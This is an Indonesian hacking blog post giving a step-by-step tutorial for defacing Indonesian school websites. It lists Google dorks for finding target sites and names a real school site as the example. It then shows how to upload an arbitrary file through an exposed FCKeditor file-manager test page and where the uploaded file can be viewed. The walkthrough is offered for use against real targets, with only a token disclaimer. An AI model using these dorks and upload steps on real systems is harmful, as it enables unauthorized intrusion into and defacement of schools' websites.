Tukaran Link/Banner


Tukeran Link? Copy/paste code HTML berikut ke blog anda, kalo udah Bilang Ke saya >> facebook.com/dickaluphayum dan akan saya pasang balik

Baner Teman



Photobucket

Link Sahabat

Selasa, 11 September 2012

1 Deface Webiste Sch.id

Date: Selasa, 11 September 2012 01.14
Category:
Author: Nama Dirahasiakan
Share:
Responds: 1 Comment
Deface Website Sch.id - Assalamualikum Sobat, Bertemu lagi, kali ini admin mau update yang mengenai deface website. Gak usah lama lama yah, langsung aja kita liat ini, Cekidott...

1. Siapkan file format .txt. ( bisa di buat di notepad ).

2. Buka Google lalu masukan Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php? 
 
 
 Terserah sobat mau pilih yang mana. Sebagai contoh admin pilih ini aja
www.smkn1kuta.sch.id/

3. Exploit: /editor/filemanager/connectors/test.html
Kalo bingung masukin Exploit nya, ini contohnya

eX: www.smkn1kuta.sch.id/

di masukin Exploit jadi begini

 www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html,
 Nahh begitu ujung nya di tambahin :D
Tekan Enter dehh atau masuk kesana , dan akan terlihat seperti ini

Nah sekarang di kolom Connector yang defaultnya ASP jadikan PHP trus resource type nya ganti file. Trus klik Browse....... cari file.txt sobat..........kalo sudah klik open dan klik Upload

 Hasil nya akan seperti gambar yang di atas bila BERHASIL
Selain itu ada kemungkinan gagal. Banyak kemungkinan, mungkin nama file sudah ada sehingga akan menambah sesuatu seperti (1). Ok lanjut, terus cara ngeliat hasil nya

http://www.[site].sch.id/userfiles/file/namafilesobat.txt
http://www.[site].sch.id/userfiles/namafilesobat.txt
jadi punya Admin masuk di
http://www.smkn1kuta.sch.id/userfiles/file/Dicka.txt bisa di klik untuk melihat hasilnya :D

Selesai :D Kamu telah berhasil men-Deface nya walaupun bukan di Index nya (oops :)

Semoga Berhasil dan Semoga Bermanfaat ^_^

Jangan di Salah Gunakan Yha !!

 

ads ads ads ads

Artikel Terkait :



1 comment

25 Mei 2015 04.34

cara mengembalikan dari deface gmna gan ?

Posting Komentar